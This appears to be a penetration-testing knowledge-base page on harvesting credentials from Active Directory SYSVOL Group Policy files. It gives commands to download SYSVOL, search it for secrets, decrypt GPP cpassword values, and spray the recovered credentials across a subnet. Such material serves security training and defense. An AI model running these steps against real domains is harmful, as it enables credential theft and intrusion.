Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / Secrets / Techniques

GPO

GPO secrets are credentials and configuration data exposed through SYSVOL. Every domain user can normally read SYSVOL, so old Group Policy Preference XML, scripts, registry policy files, and operational configuration become a common first credential-access stop.

List SYSVOL

smbclient "//10.10.10.200/SYSVOL" -U "ootw.local/student%student" -c 'recurse ON; ls'

Download SYSVOL

mkdir -p sysvol
smbclient "//10.10.10.200/SYSVOL" -U "ootw.local/student%student" -c 'recurse ON; prompt OFF; mget *'

Search for secrets

grep -RniE 'cpassword|password|passwd|pwd|secret|token|apikey|connectionString' sysvol/
find sysvol -iname 'Groups.xml' -o -iname 'Services.xml' -o -iname 'ScheduledTasks.xml' -o -iname 'Drives.xml' -o -iname 'DataSources.xml' -o -iname 'Registry.xml'

Windows search

Get-ChildItem "\\ootw.local\SYSVOL\ootw.local\Policies" -Recurse -Include *.xml,*.ini,*.txt,*.ps1,*.bat,*.vbs,*.config |
  Select-String -Pattern "cpassword","password","passwd","pwd","secret","token","apikey","connectionString"

Classic files

Groups.xml
Services.xml
ScheduledTasks.xml
Printers.xml
Drives.xml
DataSources.xml
Registry.xml

Decrypt GPP cpassword

gpp-decrypt '<cpassword_value>'

Validate recovered credentials

nxc smb 10.10.10.0/24 -u recovered_user -p 'RecoveredPassword!'
nxc winrm 10.10.10.0/24 -u recovered_user -p 'RecoveredPassword!'
nxc ldap 10.10.10.200 -u recovered_user -p 'RecoveredPassword!'

Other useful policy files

Registry.pol
GptTmpl.inf
Scripts\Startup\*.bat
Scripts\Startup\*.ps1
Scripts\Logon\*.bat
Scripts\Logon\*.vbs
Machine\Preferences\Registry\Registry.xml
User\Preferences\Drives\Drives.xml

Notes

This overlaps with GPO enumeration, but the goal here is credential recovery rather than policy abuse.

Old cpassword values are decryptable because the AES key is public. Even stale credentials deserve validation because password reuse often keeps them alive.